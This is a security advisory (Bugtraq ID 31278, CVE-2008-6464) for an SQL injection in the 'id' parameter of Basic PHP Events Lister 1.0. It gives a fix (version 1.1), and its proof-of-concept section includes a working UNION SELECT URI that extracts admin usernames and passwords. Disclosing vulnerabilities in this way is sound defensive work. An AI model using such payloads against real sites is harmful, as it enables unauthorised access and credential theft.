Mevin Productions Basic PHP Events Lister 'id' Parameter SQL Injection Vulnerability
BID:31278
Info
Mevin Productions Basic PHP Events Lister 'id' Parameter SQL Injection Vulnerability
| Bugtraq ID: | 31278 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-6464 |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 21 2008 12:00AM |
| Updated: | May 07 2015 05:23PM |
| Credit: | 0x90 |
| Vulnerable: |
Mevin Productions Basic PHP Events Lister 1.0 |
| Not Vulnerable: |
Mevin Productions Basic PHP Events Lister 1.1 |
Discussion
Mevin Productions Basic PHP Events Lister 'id' Parameter SQL Injection Vulnerability
Basic PHP Events Lister is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
Basic PHP Events Lister 1.0 is vulnerable; other versions may also be affected.
Basic PHP Events Lister is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
Basic PHP Events Lister 1.0 is vulnerable; other versions may also be affected.
Exploit / POC
Mevin Productions Basic PHP Events Lister 'id' Parameter SQL Injection Vulnerability
Attackers can exploit this issue via a browser.
The following example URI is available:
http://www.example.com/event.php?id=-0x90+union+select+0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,concat(uname,0x3a,pword),0x90+from+admin--
Attackers can exploit this issue via a browser.
The following example URI is available:
http://www.example.com/event.php?id=-0x90+union+select+0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,concat(uname,0x3a,pword),0x90+from+admin--
Solution / Fix
Mevin Productions Basic PHP Events Lister 'id' Parameter SQL Injection Vulnerability
Solution:
The vendor has released a fix. Please see the references for more information.
Mevin Productions Basic PHP Events Lister 1.0
Solution:
The vendor has released a fix. Please see the references for more information.
Mevin Productions Basic PHP Events Lister 1.0
-
Mevin Productions Basic-php-events-lister1.1.zip
http://www.mevin.com/downloads/Basic-php-events-lister1.1.zip
References
Mevin Productions Basic PHP Events Lister 'id' Parameter SQL Injection Vulnerability
References:
References:
- Basic PHP Events Lister Changelog (Mevin Productions)
- Basic PHP Events Lister Homepage (Mevin Productions)